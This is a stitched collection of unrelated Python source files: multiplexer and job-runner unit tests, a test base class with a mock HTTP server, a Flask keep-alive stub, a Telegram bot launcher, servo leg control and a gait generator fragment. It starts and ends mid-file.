context=EnvelopeContext(connection_id=fake_connection_id),
)
with unittest.mock.patch.object(aea.mail.base.logger, "error") as mock_logger_error:
multiplexer.put(envelope)
time.sleep(0.1)
mock_logger_error.assert_called_with(
"No connection registered with id: {}.".format(fake_connection_id)
)
multiplexer.disconnect()
def test_get_from_multiplexer_when_empty():
"""Test that getting an envelope from the multiplexer when the input queue is empty raises an exception."""
connection = _make_dummy_connection()
multiplexer = Multiplexer([connection])
with pytest.raises(aea.mail.base.Empty):
multiplexer.get()
# TODO: fix test; doesn't make sense to use same multiplexer for different agents
# def test_multiple_connection():
# """Test that we can send a message with two different connections."""
# with LocalNode() as node:
# identity_1 = Identity("", address="address_1")
# identity_2 = Identity("", address="address_2")
# connection_1 = _make_local_connection(identity_1.address, node)
# connection_2 = _make_dummy_connection()
# multiplexer = Multiplexer([connection_1, connection_2])
# assert not connection_1.is_connected
# assert not connection_2.is_connected
# multiplexer.connect()
# assert connection_1.is_connected
# assert connection_2.is_connected
# message = DefaultMessage(
# dialogue_reference=("", ""),
# message_id=1,
# target=0,
# performative=DefaultMessage.Performative.BYTES,
# content=b"hello",
# )
# envelope_from_1_to_2 = Envelope(
# to=identity_2.address,
# sender=identity_1.address,
# protocol_id=DefaultMessage.protocol_id,
# message=DefaultSerializer().encode(message),
# context=EnvelopeContext(connection_id=connection_1.connection_id),
# )
# multiplexer.put(envelope_from_1_to_2)
# actual_envelope = multiplexer.get(block=True, timeout=2.0)
# assert envelope_from_1_to_2 == actual_envelope
# envelope_from_2_to_1 = Envelope(
# to=identity_1.address,
# sender=identity_2.address,
# protocol_id=DefaultMessage.protocol_id,
# message=DefaultSerializer().encode(message),
# context=EnvelopeContext(connection_id=connection_2.connection_id),
# )
# multiplexer.put(envelope_from_2_to_1)
# actual_envelope = multiplexer.get(block=True, timeout=2.0)
# assert envelope_from_2_to_1 == actual_envelope
# multiplexer.disconnect()
def test_send_message_no_supported_protocol():
"""Test the case when we send an envelope with a specific connection that does not support the protocol."""
with LocalNode() as node:
identity_1 = Identity("", address="address_1")
public_id = PublicId.from_str("fetchai/my_private_protocol:0.1.0")
connection_1 = _make_local_connection(
identity_1.address,
node,
restricted_to_protocols={public_id},
excluded_protocols={public_id},
)
multiplexer = Multiplexer([connection_1])
multiplexer.connect()
with mock.patch.object(aea.mail.base.logger, "warning") as mock_logger_warning:
protocol_id = UNKNOWN_PROTOCOL_PUBLIC_ID
envelope = Envelope(
to=identity_1.address,
sender=identity_1.address,
protocol_id=protocol_id,
message=b"some bytes",
)
multiplexer.put(envelope)
time.sleep(0.5)
mock_logger_warning.assert_called_with(
"Connection {} cannot handle protocol {}. Cannot send the envelope.".format(
connection_1.connection_id, protocol_id
)
)
multiplexer.disconnect()
def test_autoset_default_connection():
"""Set default connection automatically."""
connection_1 = _make_dummy_connection()
connection_2 = _make_dummy_connection()
connections = [connection_1, connection_2]
multiplexer = Multiplexer(connections)
multiplexer._default_connection = None
multiplexer._set_default_connection_if_none()
assert multiplexer._default_connection == connections[0]
@pytest.mark.asyncio
async def test_disconnect_when_not_connected():
"""Test disconnect when not connected."""
connection_1 = _make_dummy_connection()
connections = [connection_1]
multiplexer = AsyncMultiplexer(connections)
with patch.object(multiplexer, "_disconnect_all") as disconnect_all_mocked:
await multiplexer.disconnect()
disconnect_all_mocked.assert_not_called()
@pytest.mark.asyncio
async def test_exit_on_none_envelope():
"""Test sending task exit on None envelope."""
connection_1 = _make_dummy_connection()
connections = [connection_1]
multiplexer = AsyncMultiplexer(connections, loop=asyncio.get_event_loop())
try:
await multiplexer.connect()
assert multiplexer.is_connected
multiplexer.put(None)
await asyncio.sleep(0.5)
assert multiplexer._send_loop_task.done()
finally:
await multiplexer.disconnect()
@pytest.mark.asyncio
async def test_inbox_outbox():
"""Test InBox OutBox objects."""
connection_1 = _make_dummy_connection()
connections = [connection_1]
multiplexer = AsyncMultiplexer(connections, loop=asyncio.get_event_loop())
msg = DefaultMessage(performative=DefaultMessage.Performative.BYTES, content=b"",)
msg.counterparty = "to"
msg.sender = "sender"
context = EnvelopeContext(connection_id=connection_1.connection_id)
envelope = Envelope(
to="to",
sender="sender",
protocol_id=msg.protocol_id,
message=msg,
context=context,
)
try:
await multiplexer.connect()
inbox = InBox(multiplexer)
outbox = OutBox(multiplexer, "default_address")
assert inbox.empty()
assert outbox.empty()
outbox.put(envelope)
received = await inbox.async_get()
assert received == envelope
assert inbox.empty()
assert outbox.empty()
outbox.put_message(msg, context=context)
await inbox.async_wait()
received = inbox.get_nowait()
assert received == envelope
finally:
await multiplexer.disconnect()
@pytest.mark.asyncio
async def test_outbox_negative():
"""Test InBox OutBox objects."""
connection_1 = _make_dummy_connection()
connections = [connection_1]
multiplexer = AsyncMultiplexer(connections, loop=asyncio.get_event_loop())
msg = DefaultMessage(performative=DefaultMessage.Performative.BYTES, content=b"",)
context = EnvelopeContext(connection_id=connection_1.connection_id)
envelope = Envelope(
to="to",
sender="sender",
protocol_id=msg.protocol_id,
message=b"",
context=context,
)
try:
await multiplexer.connect()
outbox = OutBox(multiplexer, "default_address")
assert outbox.empty()
with pytest.raises(ValueError) as execinfo:
outbox.put(envelope)
assert (
str(execinfo.value)
== "Only Message type allowed in envelope message field when putting into outbox."
)
assert outbox.empty()
with pytest.raises(ValueError) as execinfo:
outbox.put_message("")
assert str(execinfo.value) == "Provided message not of type Message."
assert outbox.empty()
with pytest.raises(ValueError) as execinfo:
outbox.put_message(msg)
assert (
str(execinfo.value) == "Provided message has message.counterparty not set."
)
assert outbox.empty()
msg.counterparty = "to"
with pytest.raises(ValueError) as execinfo:
outbox.put_message(msg)
assert str(execinfo.value) == "Provided message has message.sender not set."
finally:
await multiplexer.disconnect()
@pytest.mark.asyncio
async def test_default_route_applied(caplog):
"""Test default route is selected automatically."""
logger = logging.getLogger("aea.multiplexer")
with caplog.at_level(logging.DEBUG, logger="aea.multiplexer"):
connection_1 = _make_dummy_connection()
connections = [connection_1]
multiplexer = AsyncMultiplexer(connections, loop=asyncio.get_event_loop())
multiplexer.logger = logger
envelope = Envelope(
to="",
sender="",
protocol_id=DefaultMessage.protocol_id,
message=b"",
context=EnvelopeContext(),
)
multiplexer.default_routing = {
DefaultMessage.protocol_id: connection_1.connection_id
}
try:
await multiplexer.connect()
inbox = InBox(multiplexer)
outbox = InBox(multiplexer)
assert inbox.empty()
assert outbox.empty()
multiplexer.put(envelope)
await outbox.async_get()
finally:
await multiplexer.disconnect()
assert "Using default routing:" in caplog.text
def test_multiplexer_setup():
"""Test multiplexer setup to set connections."""
node = LocalNode()
tmpdir = Path(tempfile.mkdtemp())
d = tmpdir / "test_stub"
d.mkdir(parents=True)
input_file_path = d / "input_file.csv"
output_file_path = d / "input_file.csv"
connection_1 = _make_local_connection("my_addr", node)
connection_2 = _make_stub_connection(input_file_path, output_file_path)
connection_3 = _make_dummy_connection()
connections = [connection_1, connection_2, connection_3]
multiplexer = Multiplexer([])
with pytest.raises(AssertionError):
multiplexer._connection_consistency_checks()
multiplexer.setup(connections, default_routing=None)
multiplexer._connection_consistency_checks()
|
test_base.py
|
# Copyright 2014 Scalyr Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------
#
#
# author: Steven Czerwinski <czerwin@scalyr.com>
from __future__ import unicode_literals
from __future__ import absolute_import
from __future__ import print_function
if False: # NOSONAR
from typing import Optional
from io import open
__author__ = "czerwin@scalyr.com"
import os
import sys
import re
import shutil
import threading
import time
import tempfile
import unittest
import random
from pprint import pprint
import scalyr_agent.scalyr_logging as scalyr_logging
import six
from scalyr_agent.util import StoppableThread
from scalyr_agent import util as scalyr_util
PYTHON_26_OR_OLDER = sys.version_info[:2] < (2, 7)
# Need so we can patch print() function for test purposes under both, Python 2 and 3
print = print
LOG = scalyr_logging.getLogger(__name__)
def _noop_skip(reason):
def decorator(test_func_or_obj):
if not isinstance(test_func_or_obj, type) or sys.version_info < (2, 7, 0):
def test_skip_wrapper(*args, **kwargs):
print(
'Skipping test %s. Reason: "%s"'
% (test_func_or_obj.__name__, reason)
)
return test_skip_wrapper
else:
test_func_or_obj.__unittest_skip__ = True
test_func_or_obj.__unittest_skip_why__ = reason
return test_func_or_obj
return decorator
def _id(obj):
return obj
def _noop_skip_if(condition, reason):
if condition:
return _noop_skip(reason)
return _id
def _noop_skip_unless(condition, reason):
if not condition:
return _noop_skip(reason)
return _id
skip = _noop_skip
if hasattr(unittest, "skip"):
skip = unittest.skip
skipUnless = _noop_skip_unless
if hasattr(unittest, "skipUnless"):
skipUnless = unittest.skipUnless
skipIf = _noop_skip_if
if hasattr(unittest, "skipIf"):
skipIf = unittest.skipIf
# Global state as to whether or not we've started the thread watcher. We only want one instance of this
# started per entire test suite run.
__thread_watcher_started = False
def _thread_watcher():
"""Used to detect what threads are still alive after the tests should be finished running. In particular, this
helps detect cases where the tests have run successfully but some thread spawned by a test case did not
properly stop. Since it is not a daemon thread, it will block the exit of the entire process.
"""
# Sleep for 45 seconds since our test suites typically run in less than 15 seconds.
time.sleep(45)
# If we are still alive after 60 seconds, it means some test is hung or didn't join
# its threads properly. Let's get some information on them.
print("Detected hung test run. Active threads are:")
for t in threading.enumerate():
if t.getName() in ["MainThread", "hung thread watcher"]:
# Exclude itself and main thread
continue
print("Active thread %s daemon=%s" % (t.getName(), six.text_type(t.isDaemon())))
pprint(t.__dict__)
print("Done")
# NOTE: We exit with non-zero here to fail early in Circle CI instead of waiting on build
# timeout (10 minutes)
sys.exit(1)
def _start_thread_watcher_if_necessary():
"""Starts the thread watcher if it hasn't already been started.
"""
global __thread_watcher_started
if not __thread_watcher_started:
thread = threading.Thread(name="hung thread watcher", target=_thread_watcher)
thread.setDaemon(True)
thread.start()
__thread_watcher_started = True
class BaseScalyrTestCase(unittest.TestCase):
"""Used to define ScalyrTestCase below.
This augments the standard TestCase by capturing all logged lines to stdout and
adds protection to help detect hung test threads.
"""
# noinspection PyPep8Naming
def __init__(self, methodName="runTest", verify_setup_invoked=False):
unittest.TestCase.__init__(self, methodName=methodName)
# Add in some code to check to make sure that derived classed invoked this classes `setUp` method if
# they overrode it.
if verify_setup_invoked:
self.__setup_invoked = False
self.addCleanup(self.verify_setup_invoked)
def setUp(self):
# We need to reset the log destinations here because it is only at this point is stdout replaced with
# whatever object is capturing stdout for this test case.
scalyr_logging.set_log_destination(use_stdout=True)
self.__setup_invoked = True
# Enable keys sort for json.dumps to make it easier to assert on the serialized output
scalyr_util.SORT_KEYS = True
# NOTE: orjson doesn't support sort_keys so we fallback to implementation which supports it
scalyr_util.set_json_lib("json")
def tearDown(self):
scalyr_util.SORT_KEYS = False
# It's important we close all the open FDs used by loggers otherwise tests will fail on
# Windows because the file will still be opened
scalyr_logging.close_handlers()
def run(self, result=None):
_start_thread_watcher_if_necessary()
StoppableThread.set_name_prefix("TestCase %s: " % six.text_type(self))
return unittest.TestCase.run(self, result=result)
def verify_setup_invoked(self):
self.assertTrue(
self.__setup_invoked,
msg="Inherited setUp method was not invoked by class derived from ScalyrTestCase",
)
if sys.version_info[:2] < (2, 7):
class ScalyrTestCase(BaseScalyrTestCase):
"""The base class for Scalyr tests.
This is used mainly to hide differences between the test fixtures available in the various Python
versions.
WARNING: Derived classes that override setUp, must be sure to invoke the inherited setUp method.
"""
# noinspection PyPep8Naming
def __init__(self, methodName="runTest"):
# Do not verify the setup was invoked since it relies on addCleanup which is only available in 2.7
BaseScalyrTestCase.__init__(
self, methodName=methodName, verify_setup_invoked=False
)
def assertIs(self, obj1, obj2, msg=None):
"""Just like self.assertTrue(a is b), but with a nicer default message."""
if obj1 is not obj2:
if msg is None:
msg = "%s is not %s" % (obj1, obj2)
self.fail(msg)
def assertIsNone(self, obj, msg=None):
"""Same as self.assertTrue(obj is None), with a nicer default message."""
if msg is not None:
self.assertTrue(obj is None, msg)
else:
self.assertTrue(obj is None, "%s is not None" % (six.text_type(obj)))
def assertIsNotNone(self, obj, msg=None):
"""Included for symmetry with assertIsNone."""
if msg is not None:
self.assertTrue(obj is not None, msg)
else:
self.assertTrue(obj is not None, "%s is None" % (six.text_type(obj)))
def assertGreater(self, a, b, msg=None):
if msg is not None:
self.assertTrue(a > b, msg)
else:
self.assertTrue(
a > b,
"%s is greater than %s" % (six.text_type(a), six.text_type(b)),
)
def assertLess(self, a, b, msg=None):
if msg is not None:
self.assertTrue(a < b, msg)
else:
self.assertTrue(
a < b,
"%s is greater than %s" % (six.text_type(a), six.text_type(b)),
)
def assertRaisesRegexp(self, exc_cls, expected_msg, func, *args, **kwargs):
"""
Compatibility layer for assertRaisesRegexp which also works under Python 2.6.
"""
try:
func(*args, **kwargs)
except Exception as e:
if not isinstance(e, exc_cls):
raise AssertionError(
'Expected class "%s", got "%s"'
% (exc_cls.__name__, e.__class__.__name__)
)
if not re.search(expected_msg, str(e)):
raise AssertionError(
'Expected "%s" message, got "%s"' % (expected_msg, str(e))
)
else:
class ScalyrTestCase(BaseScalyrTestCase):
"""The base class for Scalyr tests.
This is used mainly to hide differences between the test fixtures available in the various Python
versions.
WARNING: Derived classes that override setUp, must be sure to invoke the inherited setUp method.
"""
# noinspection PyPep8Naming
def __init__(self, methodName="runTest"):
BaseScalyrTestCase.__init__(
self, methodName=methodName, verify_setup_invoked=True
)
def assertIs(self, obj1, obj2, msg=None):
unittest.TestCase.assertIs(self, obj1, obj2, msg=msg)
def assertIsNone(self, obj, msg=None):
unittest.TestCase.assertIsNone(self, obj, msg=msg)
def assertIsNotNone(self, obj, msg=None):
unittest.TestCase.assertIsNotNone(self, obj, msg=msg)
def assertGreater(self, a, b, msg=None):
unittest.TestCase.assertGreater(self, a, b, msg=msg)
def assertLess(self, a, b, msg=None):
unittest.TestCase.assertLess(self, a, b, msg=msg)
class BaseScalyrLogCaptureTestCase(ScalyrTestCase):
"""
Base test class which captures log data produced by code called inside the tests into the log
files created in "directory_path" directory as defined by that class variable.
Directory available via "directory_path" variable is automatically created in a secure random
fashion for each test invocation inside setUp() method.
In addition to creating this directory, this method also sets up agent logging so it logs to
files in that directory.
On tearDown() the log directory is removed if tests pass and assertion hasn't failed, but if the
assertion fails, directory is left in place so developer can inspect the log content which might
aid with test troubleshooting.
"""
# Path to the directory with the agent logs
logs_directory = None # type: Optional[str]
# Path to the main agent log file
agent_log_path = None # type: Optional[str]
# Path to the agent debug log file (populated inside setUp()
agent_debug_log_path = None # type: Optional[str]
# Variable which indicates if assertLogFileContainsLine assertion was used and it fails
# NOTE: Due to us needing to support multiple Python versions and test runners, there is no easy
# and simple test runner agnostic way of detecting if tests have failed
__assertion_failed = False # type: bool
def setUp(self):
super(BaseScalyrLogCaptureTestCase, self).setUp()
self.logs_directory = tempfile.mkdtemp(suffix="agent-tests-log")
scalyr_logging.set_log_destination(
use_disk=True,
logs_directory=self.logs_directory,
agent_log_file_path="agent.log",
agent_debug_log_file_suffix="_debug",
)
scalyr_logging.__log_manager__.set_log_level(scalyr_logging.DEBUG_LEVEL_5)
self.agent_log_path = os.path.join(self.logs_directory, "agent.log")
self.agent_debug_log_path = os.path.join(self.logs_directory, "agent_debug.log")
def tearDown(self):
super(BaseScalyrLogCaptureTestCase, self).tearDown()
# It's important we close all the open FDs used by loggers otherwise tests will fail on
# Windows because the file will still be opened
scalyr_logging.close_handlers()
if self.__assertion_failed:
# Print the paths to which we store the output to so they can be introspected by the
# developer
test_name = self._testMethodName
print(
'Stored agent log file for test "%s" to: %s'
% (test_name, self.agent_log_path)
)
print(
'Stored agent debug log file for test "%s" to: %s'
% (test_name, self.agent_debug_log_path)
)
if not self.__assertion_failed:
shutil.rmtree(self.logs_directory)
def assertLogFileContainsLineRegex(self, expression, file_path=None):
"""
Custom assertion function which asserts that the provided log file path contains a line
which matches the provided line regular expression.
Keep in mind that this function is line oriented. If you want to perform assertion across
multiple lines, you should use "assertLogFileContainsRegex".
:param expression: Regular expression to match against each line in the file.
:param file_path: Path to the file to use. If not specified, it defaults to agent log file.
"""
file_path = file_path or self.agent_log_path
if not self._file_contains_line_regex(
file_path=file_path, expression=expression
):
with open(file_path, "r") as fp:
content = fp.read()
self.__assertion_failed = True
self.fail(
'File "%s" does not contain "%s" line expression.\n\nActual file content: %s'
% (file_path, expression, content)
)
def assertLogFileDoesntContainsLineRegex(self, expression, file_path=None):
"""
Custom assertion function which asserts that the provided log file path doesn't contains a
line which matches the provided line regular expression.
Keep in mind that this function is line oriented. If you want to perform assertion across
multiple lines, you should use "assertLogFileDoesntContainsRegex".
:param expression: Regular expression to match against each line in the file.
:param file_path: Path to the file to use. If not specified, it defaults to agent log file.
"""
file_path = file_path or self.agent_log_path
if self._file_contains_line_regex(file_path=file_path, expression=expression):
with open(file_path, "r") as fp:
content = fp.read()
self.__assertion_failed = True
self.fail(
'File "%s" contains "%s" line expression, but it shouldn\'t.\n\nActual file content: %s'
% (file_path, expression, content)
)
def assertLogFileContainsRegex(self, expression, file_path=None):
"""
Custom assertion function which asserts that the provided log file path contains a string
which matches the provided regular expression.
This function performs checks against the whole file content which means it comes handy in
scenarios where you need to perform cross line checks.
:param expression: Regular expression to match against the whole file content.
:param file_path: Path to the file to use. If not specified, it defaults to agent log file.
"""
file_path = file_path or self.agent_log_path
if not self._file_contains_regex(file_path=file_path, expression=expression):
with open(file_path, "r") as fp:
content = fp.read()
self.__assertion_failed = True
self.fail(
'File "%s" does not contain "%s" expression.\n\nActual file content: %s'
% (file_path, expression, content)
)
def assertLogFileDoesntContainsRegex(self, expression, file_path=None):
"""
Custom assertion function which asserts that the provided log file path doesn't contain a
string which matches the provided regular expression.
This function performs checks against the whole file content which means it comes handy in
scenarios where you need to perform cross line checks.
:param file_path: Path to the file to use.
:param file_path: Path to the file to use. If not specified, it defaults to agent log file.
"""
file_path = file_path or self.agent_log_path
if self._file_contains_regex(file_path=file_path, expression=expression):
with open(file_path, "r") as fp:
content = fp.read()
self.__assertion_failed = True
self.fail(
'File "%s" contains "%s" expression, but it shouldn\'t.\n\nActual file content: %s'
% (file_path, expression, content)
)
def _file_contains_line_regex(self, file_path, expression):
matcher = re.compile(expression)
with open(file_path, "r") as fp:
for line in fp:
if matcher.search(line):
return True
return False
def _file_contains_regex(self, file_path, expression):
matcher = re.compile(expression)
with open(file_path, "r") as fp:
content = fp.read()
return bool(matcher.search(content))
class ScalyrMockHttpServerTestCase(ScalyrTestCase):
"""
Base Scalyr test case class which starts mock http server on startUpClass() and stops it on
tearDownClass()
"""
mock_http_server_thread = None
@classmethod
def setUpClass(cls):
cls.mock_http_server_thread = MockHTTPServer()
cls.mock_http_server_thread.start()
# Give server some time to start up
time.sleep(0.5)
@classmethod
def tearDownClass(cls):
if cls.mock_http_server_thread:
cls.mock_http_server_thread.stop()
def shutdown_flask_server():
from flask import request
func = request.environ["werkzeug.server.shutdown"]
func()
return ""
class MockHTTPServer(StoppableThread):
"""
Mock HTTP server which can be used for tests.
It works by starting a mock HTTP server which serves a flask app on localhost and random port.
"""
def __init__(self, host="127.0.0.1", port=None):
# type: (str, Optional[int]) -> None
if not port:
port = random.randint(5000, 20000)
super(MockHTTPServer, self).__init__(name="MockHttpServer_%s_%s" % (host, port))
from flask import Flask
self.host = host
self.port = port
# Make sure we run in the background
self.setDaemon(True)
self.app = Flask("mock_app")
self.app.add_url_rule("/shutdown", view_func=shutdown_flask_server)
def run(self):
LOG.info(
"Starting mock http server and listening on: %s:%s" % (self.host, self.port)
)
self.app.run(host=self.host, port=self.port)
super(MockHTTPServer, self).run()
def stop(self, wait_on_join=True, join_timeout=2):
import requests
LOG.info("Stopping mock http server...")
# Sadly there is no better way to kill werkzeug server...
url = "http://%s:%s/shutdown" % (self.host, self.port)
requests.get(url)
self.app.do_teardown_appcontext()
super(MockHTTPServer, self).stop(wait_on_join=True, join_timeout=0.1)
|
test_runner_local.py
|
import os
import threading
import time
from unittest import TestCase
from galaxy.util import bunch
from galaxy.jobs.runners import local
from galaxy.jobs import metrics
from galaxy import model
from tools_support import (
UsesApp,
UsesTools
)
class TestLocalJobRunner( TestCase, UsesApp, UsesTools ):
def setUp( self ):
self.setup_app()
self._init_tool()
self.app.job_metrics = metrics.JobMetrics()
self.job_wrapper = MockJobWrapper( self.app, self.test_directory, self.tool )
def tearDown( self ):
self.tear_down_app()
def test_run( self ):
self.job_wrapper.command_line = "echo HelloWorld"
runner = local.LocalJobRunner( self.app, 1 )
runner.queue_job( self.job_wrapper )
assert self.job_wrapper.stdout.strip() == "HelloWorld"
def test_galaxy_lib_on_path( self ):
self.job_wrapper.command_line = '''python -c "import galaxy.util"'''
runner = local.LocalJobRunner( self.app, 1 )
runner.queue_job( self.job_wrapper )
assert self.job_wrapper.exit_code == 0
def test_default_slots( self ):
self.job_wrapper.command_line = '''echo $GALAXY_SLOTS'''
runner = local.LocalJobRunner( self.app, 1 )
runner.queue_job( self.job_wrapper )
assert self.job_wrapper.stdout.strip() == "1"
def test_slots_override( self ):
# Set local_slots in job destination to specify slots for
# local job runner.
self.job_wrapper.job_destination.params[ "local_slots" ] = 3
self.job_wrapper.command_line = '''echo $GALAXY_SLOTS'''
runner = local.LocalJobRunner( self.app, 1 )
runner.queue_job( self.job_wrapper )
assert self.job_wrapper.stdout.strip() == "3"
def test_exit_code( self ):
self.job_wrapper.command_line = '''sh -c "exit 4"'''
runner = local.LocalJobRunner( self.app, 1 )
runner.queue_job( self.job_wrapper )
assert self.job_wrapper.exit_code == 4
def test_metadata_gets_set( self ):
runner = local.LocalJobRunner( self.app, 1 )
runner.queue_job( self.job_wrapper )
assert os.path.exists( self.job_wrapper.mock_metadata_path )
def test_metadata_gets_set_if_embedded( self ):
self.job_wrapper.job_destination.params[ "embed_metadata_in_job" ] = "True"
# Kill off cruft for _handle_metadata_externally and make sure job stil works...
self.job_wrapper.external_output_metadata = None
self.app.datatypes_registry.set_external_metadata_tool = None
runner = local.LocalJobRunner( self.app, 1 )
runner.queue_job( self.job_wrapper )
assert os.path.exists( self.job_wrapper.mock_metadata_path )
def test_stopping_job( self ):
self.job_wrapper.command_line = '''python -c "import time; time.sleep(15)"'''
runner = local.LocalJobRunner( self.app, 1 )
def queue():
runner.queue_job( self.job_wrapper )
t = threading.Thread(target=queue)
t.start()
while True:
if self.job_wrapper.external_id:
break
time.sleep( .01 )
external_id = self.job_wrapper.external_id
mock_job = bunch.Bunch(
get_external_output_metadata=lambda: None,
get_job_runner_external_id=lambda: str(external_id),
get_id=lambda: 1
)
runner.stop_job( mock_job )
t.join(1)
class MockJobWrapper( object ):
def __init__( self, app, test_directory, tool ):
working_directory = os.path.join( test_directory, "workdir" )
tool_working_directory = os.path.join( working_directory, "working" )
os.makedirs( tool_working_directory )
self.app = app
self.tool = tool
self.requires_containerization = False
self.state = model.Job.states.QUEUED
self.command_line = "echo HelloWorld"
self.environment_variables = []
self.commands_in_new_shell = False
self.prepare_called = False
self.write_version_cmd = None
self.dependency_shell_commands = None
self.working_directory = working_directory
self.tool_working_directory = tool_working_directory
self.requires_setting_metadata = True
self.job_destination = bunch.Bunch( id="default", params={} )
self.galaxy_lib_dir = os.path.abspath( "lib" )
self.job_id = 1
self.external_id = None
self.output_paths = [ '/tmp/output1.dat' ]
self.mock_metadata_path = os.path.abspath( os.path.join( test_directory, "METADATA_SET" ) )
self.metadata_command = "touch %s" % self.mock_metadata_path
self.galaxy_virtual_env = None
self.shell = "/bin/bash"
# Cruft for setting metadata externally, axe at some point.
self.external_output_metadata = bunch.Bunch(
set_job_runner_external_pid=lambda pid, session: None
)
self.app.datatypes_registry.set_external_metadata_tool = bunch.Bunch(
build_dependency_shell_commands=lambda: []
)
def prepare( self ):
self.prepare_called = True
def set_job_destination( self, job_destination, external_id ):
self.external_id = external_id
def get_command_line( self ):
return self.command_line
def get_id_tag( self ):
return "1"
def get_state( self ):
return self.state
def change_state( self, state ):
self.state = state
def get_output_fnames( self ):
return []
def get_job( self ):
return model.Job()
def setup_external_metadata( self, **kwds ):
return self.metadata_command
def get_env_setup_clause( self ):
return ""
def has_limits( self ):
return False
def finish( self, stdout, stderr, exit_code ):
self.stdout = stdout
self.stderr = stderr
self.exit_code = exit_code
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Hello. The bot is online!"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
pytelebot.py
|
# PoHelper (PoHelper Telegram bot powered by Python)
# Copyright (C) 2022 drlorente97.eth <drlorente97@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# General Declarations
from curses import wrapper
import threading
import time
# Import Modules
import signalHandler
import logger
import dbEngine
import gInterface
import telegramInterface
import messageEngine
# Main code
def main(screen):
# Draw main window
mainWindow = gInterface.intro()
mainWindow.build()
mainWindow.border()
mainWindow.write('PoHelper: Telegram bot powered by Python', y=1, x=1)
mainWindow.write('Copyright (C) 2022 drlorente97.eth <drlorente97@gmail.com>', y=2, x=1)
mainWindow.refresh()
# Draw log window
logBox = gInterface.logbox()
logBox.build()
logBox.scroll_on()
# Init Log Handler
log = logger.Log(logBox)
# Init Signal Handler
sig = signalHandler.signalHandler(log)
# Init Database Engine
db = dbEngine.dbEngine(log)
# Init Telegram Interface
teleInt = telegramInterface.telegramInterface(log, sig.start_shutdown)
# Define worker
def messageEngine_worker(teleInt, log, num):
worker = messageEngine.messageEngine(teleInt, num)
# Define worker threads amount
workerAmount = 1
# Set up Message Engine Threads
worker_threads = []
i = 0
while i < workerAmount:
worker_threads.append(threading.Thread(target=messageEngine_worker, name=str(i+1), args=(teleInt, log, str(i+1))))
i += 1
# Start threads
try:
for thread in worker_threads:
thread.start()
time.sleep(0.1)
while True:
# Watchdog
if sig.start_shutdown.is_set():
break
# Scroll log window
log.logbox.read_key()
except:
log.error('Bot has been crash :(')
sig.start_shutdown.set()
finally:
for thread in worker_threads:
thread.join()
name = thread.getName()
log.warning(f"Message engine thread {name} is stoped")
log.warning("Telebot stoped, have a nice day :)")
if __name__ == '__main__':
# Launch wrapper on main
wrapper(main)
|
LegsControl.py
|
import time
from multiprocessing import Process
import navio.pwm
import navio.util
navio.util.check_apm()
SERVO_MIN = 0.700 # ms
SERVO_MAX = 1.500 # ms
PERIOD = 50
MAX_h1_front = 80
MAX_h1_rear = 130
h1_moving_angle = 70
MIN_h1_front = MAX_h1_front - h1_moving_angle
MIN_h1_rear = MAX_h1_rear - h1_moving_angle
MIN_h2 = 50
MAX_h2_front = 70
MAX_h2_rear = 70
DELAY = 0.01
PWM_UNUSED = 7
class RobotLeg:
def __init__(self, m1, m2, m1_revert=0, m2_revert=0, servoMaxOffset=0, servoMinOffset=0):
self.h1 = navio.pwm.PWM(m1)
self.h2 = navio.pwm.PWM(m2)
self.h1_revert = m1_revert
self.h2_revert = m2_revert
self.servoMaxOffset = servoMaxOffset
self.servoMinOffset = servoMinOffset
# initializing
self.h1.initialize()
self.h2.initialize()
# setting period
self.h1.set_period(PERIOD)
self.h2.set_period(PERIOD)
# enable pwm
self.h1.enable()
self.h2.enable()
def move_h1(self, angle):
self.h1.set_duty_cycle(self.degreeToDuty(angle, revert=self.h1_revert))
def move_h2(self, angle):
self.h2.set_duty_cycle(self.degreeToDuty(angle, revert=self.h2_revert))
def degreeToDuty(self, degree, revert):
if revert == 1:
return (((SERVO_MAX - SERVO_MIN + self.servoMaxOffset - self.servoMinOffset) / 90.) * degree) + SERVO_MAX \
+ self.servoMaxOffset
if revert == 2:
return SERVO_MAX - (((SERVO_MAX - SERVO_MIN + self.servoMaxOffset - self.servoMinOffset) / 90.) * degree) \
+ self.servoMaxOffset
if revert == 3:
return (((SERVO_MAX - SERVO_MIN + self.servoMaxOffset - self.servoMinOffset) / 90.) * (90 - degree)) \
+ SERVO_MAX + self.servoMaxOffset
else:
return (((SERVO_MAX - SERVO_MIN + self.servoMaxOffset - self.servoMinOffset) / 90.) * degree) + SERVO_MIN \
+ self.servoMinOffset
def KeepAlive(pin):
while True:
pin.set_duty_cycle(0.001)
time.sleep(DELAY)
def KeepAliveThread():
unused = navio.pwm.PWM(PWM_UNUSED)
unused.initialize()
unused.set_period(PERIOD)
unused.enable()
try:
KA = Process(target=KeepAlive,args=(unused,))
KA.start()
except:
print "Error: unable to start thread"
|
GaitGenerator.py
|
import numpy as np
import threading
import time
import LegTrajectory as lt
import IK
import TimerIMU as ti
import DynamixelController as dc
class quadrupedGait():
def __init__(self, _leg_centers, _leg_start_states, _body_h, _leg_up_h, _h_offset, _T, _dt, _classIMU):
self.leg_center = _leg_centers
self.leg_cur_states = _leg_start_states
self.leg_pre_states = _leg_start_states
self.theta_list = [
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]
]
self.theta_pre_list = [
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]
]
self.pre_theta_flag = [False, False, False, False]
self.body_h = _body_h
self.leg_up_h = _leg_up_h
self.h_offset = _h_offset
self.T = _T
self.dt = _dt
self.tIMU = _classIMU
